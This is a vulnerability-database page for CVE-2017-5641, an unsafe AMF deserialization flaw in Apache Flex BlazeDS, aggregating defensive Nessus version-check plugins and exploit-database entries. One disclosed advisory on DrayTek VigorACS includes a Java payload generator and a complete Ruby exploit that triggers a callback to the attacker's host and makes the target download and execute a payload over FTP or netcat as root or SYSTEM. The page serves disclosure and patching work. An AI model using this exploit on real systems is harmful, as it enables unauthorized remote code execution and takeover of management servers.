Vulnerabilities > CVE-2017-5641 - Deserialization of Untrusted Data vulnerability in multiple products
Summary
Previous versions of Apache Flex BlazeDS (4.7.2 and earlier) did not restrict which types were allowed for AMF(X) object deserialization by default. During the deserialization process code is executed that for several known types has undesired side-effects. Other, unknown types may also exhibit such behaviors. One vector in the Java standard library exists that allows an attacker to trigger possibly further exploitable Java deserialization of untrusted data. Other known vectors in third party libraries can be used to trigger remote code execution.
Vulnerable Configurations
Part | Description | Count |
---|---|---|
Application | 1 | |
Application | 1 |
Common Weakness Enumeration (CWE)
Nessus
NASL family Misc. NASL id VMWARE_VCENTER_SERVER_APPLIANCE_VMSA-2017-0007.NASL description The version of VMware vCenter Server Appliance installed on the remote host is 6.0 prior to Update 3b or 6.5 prior to Update c. It is, therefore, affected by a flaw in FlexBlazeDS when processing AMF3 messages due to allowing the instantiation of arbitrary classes when deserializing objects. An unauthenticated, remote attacker can exploit this, by sending a specially crafted Java object, to execute arbitrary code. last seen 2020-06-01 modified 2020-06-02 plugin id 99474 published 2017-04-19 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/99474 title VMware vCenter Server Appliance BlazeDS AMF3 RCE (VMSA-2017-0007) code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(99474); script_version("1.6"); script_cvs_date("Date: 2019/11/13"); script_cve_id("CVE-2017-5641"); script_bugtraq_id(97383); script_xref(name:"VMSA", value:"2017-0007"); script_xref(name:"CERT", value:"307983"); script_name(english:"VMware vCenter Server Appliance BlazeDS AMF3 RCE (VMSA-2017-0007)"); script_summary(english:"Checks the version of VMware vCenter Server Appliance."); script_set_attribute(attribute:"synopsis", value: "A virtualization appliance installed on the remote host is affected by a remote code execution vulnerability."); script_set_attribute(attribute:"description", value: "The version of VMware vCenter Server Appliance installed on the remote host is 6.0 prior to Update 3b or 6.5 prior to Update c. It is, therefore, affected by a flaw in FlexBlazeDS when processing AMF3 messages due to allowing the instantiation of arbitrary classes when deserializing objects. An unauthenticated, remote attacker can exploit this, by sending a specially crafted Java object, to execute arbitrary code."); script_set_attribute(attribute:"see_also", value:"https://www.vmware.com/security/advisories/VMSA-2017-0007.html"); # https://docs.vmware.com/en/VMware-vSphere/6.0/rn/vsphere-vcenter-server-60u3b-release-notes.html script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?1bb48b81"); # https://docs.vmware.com/en/VMware-vSphere/6.5/rn/vsphere-vcenter-server-650c-release-notes.html script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?f0a01429"); script_set_attribute(attribute:"see_also", value:"https://codewhitesec.blogspot.com/2017/04/amf.html"); script_set_attribute(attribute:"solution", value: "Upgrade to VMware vCenter Server Appliance 6.0 Update 3b / 6.5 Update c or later. Alternatively, apply the vendor-supplied workaround."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-5641"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2017/04/04"); script_set_attribute(attribute:"patch_publication_date", value:"2017/04/13"); script_set_attribute(attribute:"plugin_publication_date", value:"2017/04/19"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"cpe:/a:vmware:vcenter_server_appliance"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"Misc."); script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/VMware vCenter Server Appliance/Version", "Host/VMware vCenter Server Appliance/Build"); script_require_ports("Services/ssh", 22); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); appname = 'VMware vCenter Server Appliance'; version = get_kb_item_or_exit("Host/"+appname+"/Version"); build = get_kb_item_or_exit("Host/"+appname+"/Build"); port = 0; fixversion_str = NULL; if ( version !~ "^6\.0($|[^0-9])" && version !~ "^6\.5($|[^0-9])" ) audit(AUDIT_NOT_INST, appname + " 6.0.x / 6.5.x"); if (version =~ "^6\.0($|[^0-9])") { fixed_main_ver = "6.0.0"; fixed_build = 5326079; if (int(build) < fixed_build) fixversion_str = fixed_main_ver + ' build-'+fixed_build; } else if (version =~ "^6\.5($|[^0-9])") { fixed_main_ver = "6.5.0"; fixed_build = 5318112; if (int(build) < fixed_build) fixversion_str = fixed_main_ver + ' build-'+fixed_build; } if (isnull(fixversion_str)) audit(AUDIT_INST_VER_NOT_VULN, appname, version, build); report = report_items_str( report_items:make_array( "Installed version", version + ' build-' + build, "Fixed version", fixed_main_ver + ' build-' + fixed_build ), ordered_fields:make_list("Installed version", "Fixed version") ); security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);
NASL family Misc. NASL id VMWARE_VCENTER_VMSA-2017-0007.NASL description The version of VMware vCenter Server installed on the remote host is 6.0.x prior to 6.0u3b or 6.5.x prior to 6.5c. It is, therefore, affected by a flaw in FlexBlazeDS when processing AMF3 messages due to allowing the instantiation of arbitrary classes when deserializing objects. An unauthenticated, remote attacker can exploit this, by sending a specially crafted Java object, to execute arbitrary code. last seen 2020-06-01 modified 2020-06-02 plugin id 99475 published 2017-04-19 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/99475 title VMware vCenter Server 6.0.x < 6.0u3b / 6.5.x < 6.5c BlazeDS AMF3 RCE (VMSA-2017-0007) code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(99475); script_version("1.7"); script_cvs_date("Date: 2019/11/13"); script_cve_id("CVE-2017-5641"); script_bugtraq_id(97383); script_xref(name:"VMSA", value:"2017-0007"); script_xref(name:"CERT", value:"307983"); script_name(english:"VMware vCenter Server 6.0.x < 6.0u3b / 6.5.x < 6.5c BlazeDS AMF3 RCE (VMSA-2017-0007)"); script_summary(english:"Checks the version of VMware vCenter."); script_set_attribute(attribute:"synopsis", value: "A virtualization management application installed on the remote host is affected by a remote code execution vulnerability."); script_set_attribute(attribute:"description", value: "The version of VMware vCenter Server installed on the remote host is 6.0.x prior to 6.0u3b or 6.5.x prior to 6.5c. It is, therefore, affected by a flaw in FlexBlazeDS when processing AMF3 messages due to allowing the instantiation of arbitrary classes when deserializing objects. An unauthenticated, remote attacker can exploit this, by sending a specially crafted Java object, to execute arbitrary code."); script_set_attribute(attribute:"see_also", value:"https://www.vmware.com/security/advisories/VMSA-2017-0007.html"); # https://docs.vmware.com/en/VMware-vSphere/6.0/rn/vsphere-vcenter-server-60u3b-release-notes.html script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?1bb48b81"); # https://docs.vmware.com/en/VMware-vSphere/6.5/rn/vsphere-vcenter-server-650c-release-notes.html script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?f0a01429"); script_set_attribute(attribute:"see_also", value:"https://codewhitesec.blogspot.com/2017/04/amf.html"); script_set_attribute(attribute:"solution", value: "Upgrade to VMware vCenter Server version 6.0u3b (6.0.0 build-5326177) / 6.0u3b on Windows (6.0.0 build-5318198) / 6.5.0c (6.5.0 build-5318112) or later. Alternatively, apply the vendor-supplied workaround."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-5641"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2017/04/04"); script_set_attribute(attribute:"patch_publication_date", value:"2017/04/13"); script_set_attribute(attribute:"plugin_publication_date", value:"2017/04/19"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:vmware:vcenter_server"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"Misc."); script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("find_service.nasl", "os_fingerprint.nasl", "vmware_vcenter_detect.nbin"); script_require_keys("Host/VMware/vCenter", "Host/VMware/version", "Host/VMware/release"); script_require_ports("Services/www", 80, 443); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); port = get_kb_item_or_exit("Host/VMware/vCenter"); version = get_kb_item_or_exit("Host/VMware/version"); release = get_kb_item_or_exit("Host/VMware/release"); # Extract and verify the build number build = ereg_replace( pattern:'^VMware vCenter Server [0-9\\.]+ build-([0-9]+)$', string:release, replace:"\1" ); if (empty_or_null(build) || build !~ '^[0-9]+$') audit(AUDIT_UNKNOWN_BUILD, "VMware vCenter Server"); build = int(build); release = release - 'VMware vCenter Server '; fixversion = NULL; os = get_kb_item("Host/OS"); # Check version and build numbers if (version =~ "^VMware vCenter 6\.0($|[^0-9])") { # If not paranoid, let's check to see if OS is populated if (report_paranoia < 2 && empty_or_null(os)) exit(0, "Can not determine version 6.0 fix build because Host/OS KB item is not set."); # vCenter Server 6.0 Update 3b on Windows | 13 APR 2017 | ISO Build 5318198 # Windows if ("windows" >< tolower(os)) { fixbuild = 5318198; if (build < fixbuild) fixversion = '6.0.0 build-'+fixbuild; } # vCenter Server 6.0 Update 3b on vCenter Server Appliance Build 5318203 # Standard else { fixbuild = 5318203; if (build < fixbuild) fixversion = '6.0.0 build-'+fixbuild; } } else if (version =~ "^VMware vCenter 6\.5($|[^0-9])") { # vCenter Server 6.5.0c | 13 APRIL 2017 | ISO Build 5318112 # Standard fixbuild = 5318112; if (build < fixbuild) fixversion = '6.5.0 build-'+fixbuild; } if (isnull(fixversion)) audit(AUDIT_LISTEN_NOT_VULN, 'VMware vCenter', port, release); report = report_items_str( report_items:make_array( "Installed version", release, "Fixed version", fixversion ), ordered_fields:make_list("Installed version", "Fixed version") ); security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);
Packetstorm
data source | https://packetstormsecurity.com/files/download/151535/cisco-ise-rce.txt |
id | PACKETSTORM:151535 |
last seen | 2019-02-05 |
published | 2019-02-05 |
reporter | Pedro Ribeiro |
source | https://packetstormsecurity.com/files/151535/Cisco-ISE-2.4.0-XSS-Remote-Code-Execution.html |
title | Cisco ISE 2.4.0 XSS / Remote Code Execution |
Seebug
bulletinFamily exploit description ### Vulnerability Summary A vulnerability in Vigor ACS allows unauthenticated users to cause the product to execute arbitrary code. VigorACS 2 “is a powerful centralized management software for Vigor Routers and VigorAPs, it is an integrated solution for configuring, monitoring, and maintenance of multiple Vigor devices from a single portal. VigorACS 2 is based on TR-069 standard, which is an application layer protocol that provides the secure communication between the server and CPEs, and allows Network Administrator to manage all the Vigor devices (CPEs) from anywhere on the Internet. VigorACS 2 Central Management is suitable for the enterprise customers with a large scale of DrayTek routers and APs, or the System Integrator who need to provide a real-time service for their customer’s DrayTek devices.” ### Credit An independent security researcher, Pedro Ribeiro, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program. ### Vendor Response “We’ll release the new version 2.2.2 to resolve this problem and inform the user about the CVE ID and reporter. The release note will be updated on Wednesday (Apr 4, 2018). Kindly let me know if you have further question, thank you!” ### Vulnerability Details VigorACS is a Java application that runs on both Windows and Linux. It exposes a number of servlets / endpoints under /ACSServer, which are used for various functions of VigorACS, such as the management of routers and firewalls using the TR-069 protocol [2]. One of the endpoints exposed by VigorACS, at /ACSServer/messabroker/amf, is an Adobe/Apache Flex service that is reachable by the managed routers and firewalls. This advisory shows that VigorACS uses a Flex version is vulnerable to CVE-2017-5641 [3], a vulnerability related to unsafe Java deserialization for Flex AMF ### Technical Details By sending an HTTP POST request with random data to /ACSServer/messagebroker/amf, the server will respond with a 200 OK and binary data that includes: ``` ...Unsupported AMF version XXXXX... ``` While in the server logs, a stack trace will be produced that includes the following: ``` flex.messaging.io.amf.AmfMessageDeserializer.readMessage ... flex.messaging.endpoints.amf.SerializationFilter.invoke ... ... ``` A quick Internet search revealed CVE-2017-5641 [3], which clearly states in its description: “Previous versions of Apache Flex BlazeDS (4.7.2 and earlier) did not restrict which types were allowed for AMF(X) object deserialization by default. During the deserialization process code is executed that for several known types has undesired side-effects. Other, unknown types may also exhibit such behaviors. One vector in the Java standard library exists that allows an attacker to trigger possibly further exploitable Java deserialization of untrusted data. Other known vectors in third party libraries can be used to trigger remote code execution.” Further reading in [4], [5] and [6] led to a proof of concept (Appendix A) that showed both on the server logs and in the HTTP responses that the deserialization could be exploited to achieve code execution. A fully working exploit has been released with this advisory that works in the following way: a) sends an AMF binary payload to /ACSServer/messagebroker/amf as described in [5] to trigger a Java Remote Method Protocol (JRMP) call back to the attacker b) receives the JRMP connection with ysoserial’s JRMP listener [7] c) configures ysoserial to respond with a CommonsCollections5 or CommonsCollections6 payload, as a vulnerable version of Apache Commons 3.1 is in the Java classpath of the server d) executes code as root / SYSTEM The exploit has been tested against the Linux and Windows Vigor ACS 2.2.1, although it requires a ysoserial jar patched for multi argument handling (a separate branch in [7], or alternative a ysoserial patched with CommonsCollections5Chained or CommonsCollections6Chained – see [8]). Appendix A contains the Java code used to generate the AMF payload that will be sent in step a). This code is very similar to the one in [5], and it is highly recommended to read that advisory by Markus Wulftange of Code White for a better understanding of this vulnerability. Appendix A ``` import flex.messaging.io.amf.MessageBody; import flex.messaging.io.amf.ActionMessage; import flex.messaging.io.SerializationContext; import flex.messaging.io.amf.AmfMessageSerializer; import java.io.*; public class ACSFlex { public static void main(String[] args) { Object unicastRef = generateUnicastRef(args[0], Integer.parseInt(args[1])); // serialize object to AMF message try { byte[] amf = new byte[0]; amf = serialize((unicastRef)); DataOutputStream os = new DataOutputStream(new FileOutputStream(args[2])); os.write(amf); System.out.println("Done, payload written to " + args[2]); } catch (IOException e) { e.printStackTrace(); } } public static Object generateUnicastRef(String host, int port) { java.rmi.server.ObjID objId = new java.rmi.server.ObjID(); sun.rmi.transport.tcp.TCPEndpoint endpoint = new sun.rmi.transport.tcp.TCPEndpoint(host, port); sun.rmi.transport.LiveRef liveRef = new sun.rmi.transport.LiveRef(objId, endpoint, false); return new sun.rmi.server.UnicastRef(liveRef); } public static byte[] serialize(Object data) throws IOException { MessageBody body = new MessageBody(); body.setData(data); ActionMessage message = new ActionMessage(); message.addBody(body); ByteArrayOutputStream out = new ByteArrayOutputStream(); AmfMessageSerializer serializer = new AmfMessageSerializer(); serializer.initialize(SerializationContext.getSerializationContext(), out, null); serializer.writeMessage(message); return out.toByteArray(); } } ``` acsPwn.rb ``` #!/usr/bin/ruby =begin === acsFlex.jar: import flex.messaging.io.amf.MessageBody; import flex.messaging.io.amf.ActionMessage; import flex.messaging.io.SerializationContext; import flex.messaging.io.amf.AmfMessageSerializer; import java.io.*; public class ACSFlex { public static void main(String[] args) { Object unicastRef = generateUnicastRef(args[0], Integer.parseInt(args[1])); // serialize object to AMF message try { byte[] amf = new byte[0]; amf = serialize((unicastRef)); DataOutputStream os = new DataOutputStream(new FileOutputStream(args[2])); os.write(amf); System.out.println("Done, payload written to " + args[2]); } catch (IOException e) { e.printStackTrace(); } } public static Object generateUnicastRef(String host, int port) { java.rmi.server.ObjID objId = new java.rmi.server.ObjID(); sun.rmi.transport.tcp.TCPEndpoint endpoint = new sun.rmi.transport.tcp.TCPEndpoint(host, port); sun.rmi.transport.LiveRef liveRef = new sun.rmi.transport.LiveRef(objId, endpoint, false); return new sun.rmi.server.UnicastRef(liveRef); } public static byte[] serialize(Object data) throws IOException { MessageBody body = new MessageBody(); body.setData(data); ActionMessage message = new ActionMessage(); message.addBody(body); ByteArrayOutputStream out = new ByteArrayOutputStream(); AmfMessageSerializer serializer = new AmfMessageSerializer(); serializer.initialize(SerializationContext.getSerializationContext(), out, null); serializer.writeMessage(message); return out.toByteArray(); } } === ysoserial.jar: - Use the multiarg branch of https://github.com/frohoff/ysoserial - Or patch ysoserial with CommonsCollections5Chained and CommonsCollections6Chain from https://github.com/frohoff/ysoserial/issues/71 === =end require 'ftpd' require 'tmpdir' require 'net/http' require 'uri' class String def black; "\e[30m#{self}\e[0m" end def red; "\e[31m#{self}\e[0m" end def green; "\e[32m#{self}\e[0m" end def brown; "\e[33m#{self}\e[0m" end def blue; "\e[34m#{self}\e[0m" end def magenta; "\e[35m#{self}\e[0m" end def cyan; "\e[36m#{self}\e[0m" end def gray; "\e[37m#{self}\e[0m" end def bg_black; "\e[40m#{self}\e[0m" end def bg_red; "\e[41m#{self}\e[0m" end def bg_green; "\e[42m#{self}\e[0m" end def bg_brown; "\e[43m#{self}\e[0m" end def bg_blue; "\e[44m#{self}\e[0m" end def bg_magenta; "\e[45m#{self}\e[0m" end def bg_cyan; "\e[46m#{self}\e[0m" end def bg_gray; "\e[47m#{self}\e[0m" end def bold; "\e[1m#{self}\e[22m" end def italic; "\e[3m#{self}\e[23m" end def underline; "\e[4m#{self}\e[24m" end def blink; "\e[5m#{self}\e[25m" end def reverse_color; "\e[7m#{self}\e[27m" end end # FTP server (Windows) class Driver def initialize(temp_dir) @temp_dir = temp_dir end def authenticate(user, password) # actually the client hasn't downloaded it yet, just logged in, but whatever puts '[+] Payload has been downloaded, wait for execution!'.green.bold true end def file_system(user) Ftpd::DiskFileSystem.new(@temp_dir) end end def ftp_start (temp_dir, lhost, port) driver = Driver.new(temp_dir) server = Ftpd::FtpServer.new(driver) server.interface = lhost server.port = port server.start end def tcp_start (payload, port) pl = File.binread(payload) server = TCPServer.new port loop do Thread.start(server.accept) do |client| client.write(pl) client.close puts "[+] Payload has been downloaded, wait for execution!".green.bold end end end puts "" puts "Draytek VigorACS 2 unauthenticated remote code execution (unsafe Java AMF deserialization)".cyan.bold puts "CVE-TODO".cyan.bold puts "Tested on version 2.2.1 for Windows and Linux, earlier versions are likely vulnerable".cyan.bold puts "By Pedro Ribeiro ([email protected]) / Agile Information Security".blue.bold puts "" if (ARGV.length < 5 || (ARGV[3] != "Linux" && ARGV[3] != "Windows") || !File.file?(ARGV[4])) puts "Usage: ./acsPwn.rb <rhost> <rport> <lhost> <Windows|Linux> <payload_path> [ssl]".bold puts " rhost:\t\t\tDraytek Vigor ACS server host" puts " rport:\t\t\tDraytek Vigor ACS server port" puts " lhost:\t\t\tyour IP address" puts " Windows|Linux:\t\ttarget type" puts " payload_path:\t\tPath to the payload that is going to be executed in the Vigor server" puts " ssl:\t\t\tConnects to Vigor server using SSL (by default uses plain HTTP)" puts "" puts "NOTES:\tThis exploit requires the ftpd gem installed and the java executable in the PATH." puts "\tThe included ysoserial.jar (patched for multiarg) and the included acsFlex.jar must be in the current directory." puts "\tTwo random TCP ports in the range 10000-65535 are used to receive connections from the target." puts "" exit(-1) end # we can use ysoserial's CommonsCollections5 or CommonsCollections6 exploit chain YSOSERIAL = "ysoserial-patched.jar ysoserial.exploit.JRMPListener JRMP_PORT CommonsCollections6Chained " WINDOWS_CMD = %{'cmd.exe /c @echo open SERVER PORT>script.txt&@echo binary>>script.txt&@echo get /PAYLOAD>>script.txt&@echo quit>>script.txt&@ftp -s:script.txt -v -A&@start PAYLOAD'} LINUX_CMD = %{\'nc -w 2 SERVER PORT > /tmp/PAYLOAD; chmod +x /tmp/PAYLOAD; /tmp/PAYLOAD\'} rhost = ARGV[0] rport = ARGV[1] lhost = ARGV[2].dup.force_encoding('ASCII') os = ARGV[3] payload_path = ARGV[4] payload_name = File.basename(ARGV[4]) if ARGV.length > 5 && ARGV[5] == 'ssl' ssl = true else ssl = false end Dir.mktmpdir { |temp_dir| server_port = rand(10000..65535) FileUtils.cp(payload_path, temp_dir) puts "[+] Picked port #{server_port} for the #{(os == 'Windows' ? 'FTP' : 'TCP')} server".cyan.bold # step 1: start the TCP or FTP server if os == 'Windows' ftp_start(temp_dir, lhost, server_port) else t = Thread.new{tcp_start(payload_path, server_port)} end # step 2: create the AMF payload puts "[+] Creating AMF payload...".green.bold jrmp_port = rand(10000..65535) amf_file = temp_dir + "/payload.ser" system("java -jar acsFlex.jar #{lhost} #{jrmp_port} #{amf_file}") amf_payload = File.binread(amf_file) # step 3: start the ysoserial JRMP listener puts "[+] Picked port #{jrmp_port} for the JRMP server".cyan.bold # build the command line argument that will be executed by the server cmd = (os == 'Windows' ? "java " : "java -Dysoserial.prefix=\'/bin/sh -c\' ") cmd += "-cp #{YSOSERIAL.gsub('JRMP_PORT', jrmp_port.to_s)}" cmd_final = (os == 'Windows' ? WINDOWS_CMD : LINUX_CMD).gsub("SERVER", lhost).gsub("PORT", server_port.to_s).gsub("PAYLOAD", payload_name) puts "[+] Sending command #{cmd_final}".green.bold jrmp_pid = spawn((cmd + cmd_final)) sleep 5 Process.detach(jrmp_pid) # step 4: fire the payload! uri = URI.parse("http#{ssl ? 's': ''}://#{rhost}:#{rport}") Net::HTTP.start(uri.host, uri.port, (ssl ? {:use_ssl => true, :verify_mode => OpenSSL::SSL::VERIFY_NONE } : {})) do |http| http.post('/ACSServer/messagebroker/amf', amf_payload) end puts "[+] AMF payload sent, waiting 15 seconds for payload download...".green.bold sleep 15 Process.kill("HUP", jrmp_pid) if t t.terminate end puts "[*] Payload should have executed by now, exiting!".bold } exit 0 ``` id SSV:97242 last seen 2018-06-10 modified 2018-04-25 published 2018-04-25 reporter Knownsec title Vigor ACS Unsafe Flex AMF Java Object Deserialization(CVE-2017-5641) bulletinFamily exploit description Details reference: https://codewhitesec.blogspot.kr/2017/04/amf.html Some Java implementations of AMF3 deserializers may allow instantiation of arbitrary classes via their public parameter-less constructor and subsequently call arbitrary Java Beans setter methods. The ability to exploit this vulnerability depends on the availability of classes in the class path that make use of deserialization. A remote attacker with the ability to spoof or control information may be able to send serialized Java objects with pre-set properties that result in arbitrary code execution when deserialized. The reporter has identified the following products and versions as being affected, and CVE IDS have been assigned as follows: \- Flamingo amf-serializer by Exadel, version 2.2.0 - CVE-2017-3202 \- Flex BlazeDS , versions 4.6.0.23207 and 4.7.2 - CVE-2017-5641 \- GraniteDS, version 3.1.1. GA - CVE-2017-3200 Products using these libraries may also be impacted. id SSV:92914 last seen 2017-11-19 modified 2017-04-06 published 2017-04-06 reporter Root title AMF3 Java implementations Improper Control of Dynamically-Managed Code Resources
References
- http://mail-archives.apache.org/mod_mbox/flex-dev/201703.mbox/%3C6B86C8D0-6E36-48F5-AC81-4AB3978F6746%40c-ware.de%3E
- http://mail-archives.apache.org/mod_mbox/flex-dev/201703.mbox/%3C6B86C8D0-6E36-48F5-AC81-4AB3978F6746%40c-ware.de%3E
- http://www.securityfocus.com/bid/97383
- http://www.securityfocus.com/bid/97383
- http://www.securitytracker.com/id/1038273
- http://www.securitytracker.com/id/1038273
- https://issues.apache.org/jira/browse/FLEX-35290
- https://issues.apache.org/jira/browse/FLEX-35290
- https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbhf03823en_us
- https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbhf03823en_us
- https://www.kb.cert.org/vuls/id/307983
- https://www.kb.cert.org/vuls/id/307983
- https://www.zerodayinitiative.com/advisories/ZDI-22-506/
- https://www.zerodayinitiative.com/advisories/ZDI-22-506/
- https://www.zerodayinitiative.com/advisories/ZDI-22-507/
- https://www.zerodayinitiative.com/advisories/ZDI-22-507/